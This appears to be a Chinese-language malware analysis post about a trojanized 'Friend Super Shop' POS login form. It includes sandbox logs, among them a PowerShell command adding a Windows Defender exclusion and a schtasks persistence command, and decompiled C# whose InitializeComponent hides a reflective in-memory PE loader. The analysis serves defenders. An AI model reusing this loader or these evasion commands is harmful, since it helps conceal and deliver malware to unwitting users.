09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DB8.tmp.csv,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DC9.tmp.txt,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:0,	2928,	EXEC_destroy,	C:\Windows\SysWOW64\WerFault.exe,	parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' ,	0x00000000 [操作成功完成。  ],	
09:33:21:867,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	

  

几个关键行为:

1、执行 powershell,通过 Add-MpPreference -ExclusionPath 把释放出的文件加入 Windows Defender 的排除列表:

powershell.exe, 5080:0, 2928, EXEC_create, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 , 0x00000000 [操作成功完成。 ],
2、释放隐藏文件(BA_extract_hidden,行为监控记录了释放文件的路径):  BA_extract_hidden, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。  ]

 

将文件属性设置为隐藏(数据采集)
Win7(32bit,Office2013)
 
Time & API | Arguments | Status | Return
2023/05/28 21:16:58
SetFileAttributesW
file_attributes:8199
filepath:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe
filepath_r:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe
1 1

3、通过 schtasks 创建计划任务(任务名 Updates\bWyPLjwQzmw,任务定义来自临时 XML 文件): EXEC_create, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 , 0x00000000 [操作成功完成。 ],

4、联网(样本先 GET checkip.dyndns.org 获取外网 IP;下面 WerFault.exe 到 52.168.117.173:443 的连接很可能是子进程 8816 崩溃后由 Windows 错误报告发起的,见日志中的 PROC_exec WerFault.exe -u -p 8816,应与样本自身的外联区分开):09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ],

09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],

 

09:33:20:475, WerFault.exe, 8148:8004, 2928, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ],
09:33:20:711, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:21:179, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],

综上,实际运行时观察到的行为基本上和微步沙箱报告中的行为一致!

https://s.threatbook.com/report/file/99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292

 
 

 

入口:

 

下面分析这个类的作用:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Drawing;
using System.Reflection;
using System.Windows.Forms;
using BusinessLayer;
using Entities;

namespace UILayer
{
	// Token: 0x02000003 RID: 3
	/// <summary>
	/// Login window of the "Friend Super Shop" POS application that this sample poses as.
	/// Most of the class is ordinary WinForms designer code plus the host app's login flow,
	/// but InitializeComponent() also carries the sample's real first stage: it hex-decodes
	/// a PE image from the "Pigue" string resource, loads it in memory through a reflective
	/// Assembly.Load(byte[]) call and instantiates its first exported type with the strings
	/// in T. The UI code appears to serve only as cover for that loader.
	/// </summary>
	public class LoginForm : Form
	{
		// Token: 0x06000002 RID: 2 RVA: 0x0000206B File Offset: 0x0000026B
		/// <summary>
		/// Builds the form. Because the loader lives inside InitializeComponent(), simply
		/// constructing this form (before any login) executes the payload stage.
		/// </summary>
		public LoginForm()
		{
			this.InitializeComponent();
		}

		// Token: 0x06000003 RID: 3 RVA: 0x00002099 File Offset: 0x00000299
		/// <summary>Exit button handler: shuts down the whole application.</summary>
		private void btnExit_Click(object sender, EventArgs e)
		{
			Application.Exit();
		}

		// Token: 0x06000004 RID: 4 RVA: 0x000020A4 File Offset: 0x000002A4
		/// <summary>
		/// Host-application login flow; no loader logic here. Copies both text boxes into
		/// _log, rejects empty fields, validates via posBusiness.CheckLogin and then opens
		/// the form matching posBusiness.GetTitle(): PosSystem for "PosEmployee",
		/// ManagerForm for "Manager", ViewInventory for "InventoryEmployee". Any other
		/// title silently does nothing. GetTitle is re-queried for each comparison.
		/// </summary>
		public void btnLogin_Click_1(object sender, EventArgs e)
		{
			this._log.Id = this.tbUserID.Text;
			this._log.Password = this.tbPassword.Text;
			bool flag = this.tbUserID.Text != "" && this.tbPassword.Text != "";
			if (flag)
			{
				bool flag2 = this.posBusiness.CheckLogin(this._log);
				if (flag2)
				{
					bool flag3 = this.posBusiness.GetTitle(this._log) == "PosEmployee";
					if (flag3)
					{
						base.Hide();
						PosSystem _pos = new PosSystem();
						_pos.Show();
					}
					else
					{
						bool flag4 = this.posBusiness.GetTitle(this._log) == "Manager";
						if (flag4)
						{
							base.Hide();
							ManagerForm _manager = new ManagerForm();
							_manager.Show();
						}
						else
						{
							bool flag5 = this.posBusiness.GetTitle(this._log) == "InventoryEmployee";
							if (flag5)
							{
								base.Hide();
								ViewInventory _inventory = new ViewInventory();
								_inventory.Show();
							}
						}
					}
				}
				else
				{
					MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
				}
			}
			else
			{
				// Same message for empty fields as for a failed credential check.
				MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
			}
		}

		// Token: 0x06000005 RID: 5 RVA: 0x0000220C File Offset: 0x0000040C
		/// <summary>Enter pressed while the Login button has focus triggers a click.</summary>
		private void btnLogin_KeyDown(object sender, KeyEventArgs e)
		{
			bool flag = e.KeyCode == Keys.Return;
			if (flag)
			{
				this.btnLogin.PerformClick();
				e.SuppressKeyPress = true;
				e.Handled = true;
			}
		}

		// Token: 0x06000006 RID: 6 RVA: 0x00002248 File Offset: 0x00000448
		/// <summary>Enter pressed in the password box triggers the Login click.</summary>
		private void tbPassword_KeyDown(object sender, KeyEventArgs e)
		{
			bool flag = e.KeyCode == Keys.Return;
			if (flag)
			{
				this.btnLogin.PerformClick();
				e.SuppressKeyPress = true;
				e.Handled = true;
			}
		}

		// Token: 0x06000007 RID: 7 RVA: 0x00002284 File Offset: 0x00000484
		/// <summary>Standard designer Dispose: releases the component container.</summary>
		protected override void Dispose(bool disposing)
		{
			bool flag = disposing && this.components != null;
			if (flag)
			{
				this.components.Dispose();
			}
			base.Dispose(disposing);
		}

		// Token: 0x06000008 RID: 8 RVA: 0x000022BC File Offset: 0x000004BC
		/// <summary>
		/// Designer-style control setup with the sample's loader spliced into the middle.
		/// The loader statements (resource manager, hex decode, reflective Assembly.Load,
		/// Activator.CreateInstance) are interleaved with ordinary property assignments so
		/// that a skim of "generated" code misses them; see the inline comments below.
		/// </summary>
		private void InitializeComponent()
		{
			this.panelLogin = new Panel();
			this.btnLogin = new Button();
			this.btnExit = new Button();
			this.label1 = new Label();
			this.tableLayoutPanel1 = new TableLayoutPanel();
			this.tbUserID = new TextBox();
			this.tbPassword = new TextBox();
			this.pBoxUser = new PictureBox();
			this.pBoxPass = new PictureBox();
			this.labelSuperShopName = new Label();
			this.panelLogin.SuspendLayout();
			this.tableLayoutPanel1.SuspendLayout();
			((ISupportInitialize)this.pBoxUser).BeginInit();
			((ISupportInitialize)this.pBoxPass).BeginInit();
			base.SuspendLayout();
			this.panelLogin.Anchor = AnchorStyles.None;
			this.panelLogin.BackColor = Color.Transparent;
			this.panelLogin.BorderStyle = BorderStyle.Fixed3D;
			this.panelLogin.Controls.Add(this.btnLogin);
			this.panelLogin.Controls.Add(this.btnExit);
			this.panelLogin.Controls.Add(this.label1);
			this.panelLogin.Controls.Add(this.tableLayoutPanel1);
			this.panelLogin.Location = new Point(230, 173);
			this.panelLogin.Name = "panelLogin";
			this.panelLogin.Size = new Size(339, 206);
			this.panelLogin.TabIndex = 0;
			this.btnLogin.BackColor = Color.White;
			this.btnLogin.BackgroundImageLayout = ImageLayout.None;
			this.btnLogin.FlatStyle = FlatStyle.System;
			this.btnLogin.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.btnLogin.Location = new Point(7, 138);
			this.btnLogin.Name = "btnLogin";
			this.btnLogin.Size = new Size(100, 28);
			this.btnLogin.TabIndex = 2;
			this.btnLogin.Text = "Login";
			this.btnLogin.UseVisualStyleBackColor = false;
			this.btnLogin.Click += this.btnLogin_Click_1;
			this.btnLogin.KeyDown += this.btnLogin_KeyDown;
			this.btnExit.BackColor = Color.White;
			this.btnExit.BackgroundImageLayout = ImageLayout.None;
			this.btnExit.FlatStyle = FlatStyle.System;
			this.btnExit.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.btnExit.Location = new Point(109, 138);
			this.btnExit.Name = "btnExit";
			this.btnExit.Size = new Size(100, 28);
			this.btnExit.TabIndex = 3;
			this.btnExit.Text = "Exit";
			this.btnExit.UseVisualStyleBackColor = false;
			this.btnExit.Click += this.btnExit_Click;
			this.label1.BackColor = Color.Transparent;
			this.label1.Font = new Font("Monotype Corsiva", 26.25f, FontStyle.Italic, GraphicsUnit.Point, 0);
			this.label1.ForeColor = Color.White;
			this.label1.Location = new Point(3, 0);
			this.label1.Name = "label1";
			this.label1.Size = new Size(104, 55);
			this.label1.TabIndex = 0;
			this.label1.Text = "Login";
			this.tableLayoutPanel1.ColumnCount = 2;
			this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 13.98176f));
			this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 86.01823f));
			this.tableLayoutPanel1.Controls.Add(this.tbUserID, 1, 0);
			this.tableLayoutPanel1.Controls.Add(this.tbPassword, 1, 1);
			this.tableLayoutPanel1.Controls.Add(this.pBoxUser, 0, 0);
			this.tableLayoutPanel1.Controls.Add(this.pBoxPass, 0, 1);
			this.tableLayoutPanel1.Location = new Point(3, 58);
			this.tableLayoutPanel1.Name = "tableLayoutPanel1";
			this.tableLayoutPanel1.RowCount = 2;
			this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f));
			this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f));
			this.tableLayoutPanel1.Size = new Size(329, 74);
			this.tableLayoutPanel1.TabIndex = 1;
			this.tbUserID.BackColor = SystemColors.ControlLightLight;
			this.tbUserID.Dock = DockStyle.Fill;
			this.tbUserID.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.tbUserID.ForeColor = SystemColors.WindowText;
			this.tbUserID.Location = new Point(48, 3);
			// LOADER (1/4): out of place in designer code. A resource manager bound to
			// ManagerForm's resources (not LoginForm's) — so the payload blob lives in
			// ManagerForm.resources under the key "Pigue", which is read further down.
			ComponentResourceManager resources = new ComponentResourceManager(typeof(ManagerForm));
			this.tbUserID.Name = "tbUserID";
			this.tbUserID.Size = new Size(278, 26);
			this.tbUserID.TabIndex = 0;
			this.tbPassword.Dock = DockStyle.Fill;
			this.tbPassword.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.tbPassword.Location = new Point(48, 40);
			this.tbPassword.Name = "tbPassword";
			this.tbPassword.PasswordChar = '*';
			this.tbPassword.Size = new Size(278, 26);
			this.tbPassword.TabIndex = 1;
			this.tbPassword.UseSystemPasswordChar = true;
			this.pBoxUser.BackgroundImageLayout = ImageLayout.Stretch;
			this.pBoxUser.Location = new Point(3, 3);
			this.pBoxUser.Name = "pBoxUser";
			this.pBoxUser.Size = new Size(39, 31);
			this.pBoxUser.TabIndex = 2;
			// LOADER (2/4): "4D5A" is the hex of "MZ", the PE/DOS header magic. The stored
			// resource is a hex-encoded executable with its leading characters stripped,
			// presumably so the blob on disk does not start with a recognisable PE header.
			// To recover the payload: dump the "Pigue" string, prepend "4D5A9", hex-decode.
			string hexString = "4D5A9" + resources.GetString("Pigue");
			List<byte> decBytes2 = new List<byte>();
			// Decode two hex chars per byte. Substring(i, 2) would throw if the combined
			// length were odd, so the resource string presumably has odd length to pair
			// with the 5-character prefix — verify on the actual sample.
			for (int i = 0; i < hexString.Length; i += 2)
			{
				byte b = BitConverter.GetBytes(Convert.ToInt16(hexString.Substring(i, 2), 16))[0];
				decBytes2.Add(b);
			}
			this.pBoxUser.TabStop = false;
			this.pBoxPass.BackgroundImageLayout = ImageLayout.Stretch;
			this.pBoxPass.Location = new Point(3, 40);
			this.pBoxPass.Name = "pBoxPass";
			this.pBoxPass.Size = new Size(39, 31);
			this.pBoxPass.TabIndex = 3;
			this.pBoxPass.TabStop = false;
			this.labelSuperShopName.Anchor = AnchorStyles.None;
			this.labelSuperShopName.BackColor = Color.Transparent;
			this.labelSuperShopName.FlatStyle = FlatStyle.Flat;
			this.labelSuperShopName.Font = new Font("Monotype Corsiva", 45f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, 0);
			this.labelSuperShopName.ForeColor = Color.Transparent;
			this.labelSuperShopName.Location = new Point(132, 67);
			// LOADER (3/4): in-memory load of the decoded PE via Assembly.Load(byte[]).
			// The call goes through Type.GetType(...).InvokeMember so that no direct
			// Assembly.Load reference appears in the IL / import table — likely aimed at
			// simple static signatures. Nothing touches disk; the payload exists only in
			// this process's memory (hunt with ETW/AMSI .NET assembly-load telemetry).
			Assembly Wr_99 = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load", BindingFlags.InvokeMethod, null, null, new object[]
			{
				decBytes2.ToArray()
			});
			// LOADER (4/4): instantiate the payload's first exported type, passing the
			// three strings in T as constructor arguments. The instance is discarded, so
			// whatever the next stage does happens inside that constructor (or a static
			// initialiser). The meaning of the arguments is not visible from this file.
			Type type = Wr_99.GetExportedTypes()[0];
			object[] t = LoginForm.T;
			Activator.CreateInstance(type, t);
			this.labelSuperShopName.Name = "labelSuperShopName";
			this.labelSuperShopName.Size = new Size(554, 91);
			this.labelSuperShopName.TabIndex = 1;
			this.labelSuperShopName.Text = "Friend Super Shop";
			this.labelSuperShopName.TextAlign = ContentAlignment.MiddleCenter;
			base.AutoScaleDimensions = new SizeF(6f, 13f);
			base.AutoScaleMode = AutoScaleMode.Font;
			this.BackgroundImageLayout = ImageLayout.Stretch;
			base.ClientSize = new Size(782, 461);
			base.ControlBox = false;
			base.Controls.Add(this.labelSuperShopName);
			base.Controls.Add(this.panelLogin);
			base.FormBorderStyle = FormBorderStyle.Fixed3D;
			base.MaximizeBox = false;
			base.MinimizeBox = false;
			base.Name = "LoginForm";
			base.StartPosition = FormStartPosition.CenterScreen;
			this.Text = "LoginForm";
			base.WindowState = FormWindowState.Maximized;
			this.panelLogin.ResumeLayout(false);
			this.tableLayoutPanel1.ResumeLayout(false);
			this.tableLayoutPanel1.PerformLayout();
			((ISupportInitialize)this.pBoxUser).EndInit();
			((ISupportInitialize)this.pBoxPass).EndInit();
			base.ResumeLayout(false);
		}

		// Token: 0x04000001 RID: 1
		// Host-app business layer used by the login handler (CheckLogin / GetTitle).
		private PosBusiness posBusiness = new PosBusiness();

		// Token: 0x04000002 RID: 2
		// Credential holder filled from the two text boxes before CheckLogin.
		private Login _log = new Login();

		// Token: 0x04000003 RID: 3
		// Constructor arguments handed to the in-memory payload type in
		// InitializeComponent(). "BusinessLayer" matches a namespace referenced by this
		// file; the first two look like hex strings but their role (key? mutex? config?)
		// can only be determined by analysing the decoded assembly.
		public static string[] T = new string[]
		{
			"7754794F",
			"6E7A62",
			"BusinessLayer"
		};

		// Token: 0x04000004 RID: 4
		private IContainer components = null;

		// Token: 0x04000005 RID: 5
		private Panel panelLogin;

		// Token: 0x04000006 RID: 6
		private Label label1;

		// Token: 0x04000007 RID: 7
		private TableLayoutPanel tableLayoutPanel1;

		// Token: 0x04000008 RID: 8
		private PictureBox pBoxUser;

		// Token: 0x04000009 RID: 9
		private PictureBox pBoxPass;

		// Token: 0x0400000A RID: 10
		private Button btnExit;

		// Token: 0x0400000B RID: 11
		private TextBox tbUserID;

		// Token: 0x0400000C RID: 12
		private TextBox tbPassword;

		// Token: 0x0400000D RID: 13
		private Button btnLogin;

		// Token: 0x0400000E RID: 14
		private Label labelSuperShopName;
	}
}

  

这个类是一个名为 LoginForm 的 Windows 窗体(Form)类,用于实现一个用户登录界面。它包含了一些控件和事件处理程序,以及与业务逻辑层和实体相关的一些操作。

以下是这个类的主要作用和功能的分析:

  1. 构造函数 LoginForm(): 构造函数是类实例化时首先执行的方法。在这里,构造函数通过调用 InitializeComponent() 方法来初始化界面的组件和布局。

  2. 按钮事件 btnExit_Click(object sender, EventArgs e): 当退出按钮被点击时,这个事件处理程序调用 Application.Exit() 方法来关闭整个应用程序。

  3. 按钮事件 btnLogin_Click_1(object sender, EventArgs e): 当登录按钮被点击时,这个事件处理程序执行用户登录的逻辑。它首先从输入框中获取用户ID和密码,然后调用 posBusiness.CheckLogin(this._log) 来检查用户登录是否成功。如果登录成功,根据用户的角色不同,会打开不同的窗体(PosSystem、ManagerForm、ViewInventory)。这部分是宿主 POS 程序原有的逻辑,本身不包含恶意行为。

  4. 按钮事件 btnLogin_KeyDown(object sender, KeyEventArgs e) 和 tbPassword_KeyDown(object sender, KeyEventArgs e): 这两个事件处理程序捕捉键盘输入事件,如果用户按下回车键,就模拟点击了登录按钮。

  5. 方法 Dispose(bool disposing): 这是一个用来释放资源的方法,当窗体被销毁时会调用。在这里,它释放了 components 对象所持有的资源。

  6. 方法 InitializeComponent(): 这个方法初始化界面的各个控件,包括登录按钮、退出按钮、文本框、图片框等等。它也设置了窗体的一些属性,比如标题、大小等。但要注意,设计器风格的代码中间夹带了几段与 UI 无关的语句,这才是样本真正的加载器:先用 ComponentResourceManager(typeof(ManagerForm)) 读取字符串资源 "Pigue",在前面拼上 "4D5A9"("4D5A" 就是 PE 文件头 "MZ"),按十六进制解码成字节数组;再通过 Type.GetType("System.Reflection.Assembly").InvokeMember("Load", ...) 反射调用 Assembly.Load(byte[]),把这个 PE 直接加载到内存(不落地);最后用 Activator.CreateInstance 以静态数组 T 中的三个字符串为构造参数实例化其第一个导出类型。窗体一构造就会执行这段逻辑,与是否登录无关。

除了上述的主要功能,还有以下值得注意的地方:

  • 这个类使用了 BusinessLayer 和 Entities 命名空间中的内容,暗示着它与业务逻辑和实体对象相关。
  • 它包含了登录逻辑,根据用户角色的不同打开不同的窗体。这可能意味着这个类是整个应用程序的入口点,负责用户的身份验证和角色判断。

总的来说,这个 LoginForm 类是一个用户登录界面的实现,负责用户登录的逻辑和界面展示,同时也涉及到了与业务逻辑和实体对象的交互。

 

不分析了,代码也没有混淆啥的。。。(补充:代码确实没有做名称混淆,但这正是它的伪装方式——把真正的恶意逻辑塞进 InitializeComponent() 里一大堆设计器生成的属性赋值之间,粗看就会漏掉。要弄清持久化、C2 等行为,需要把资源 "Pigue" 解码出来的 PE dump 下来继续分析;前面看到的计划任务、checkip 等行为很可能都来自这一层内存加载的载荷。)

 
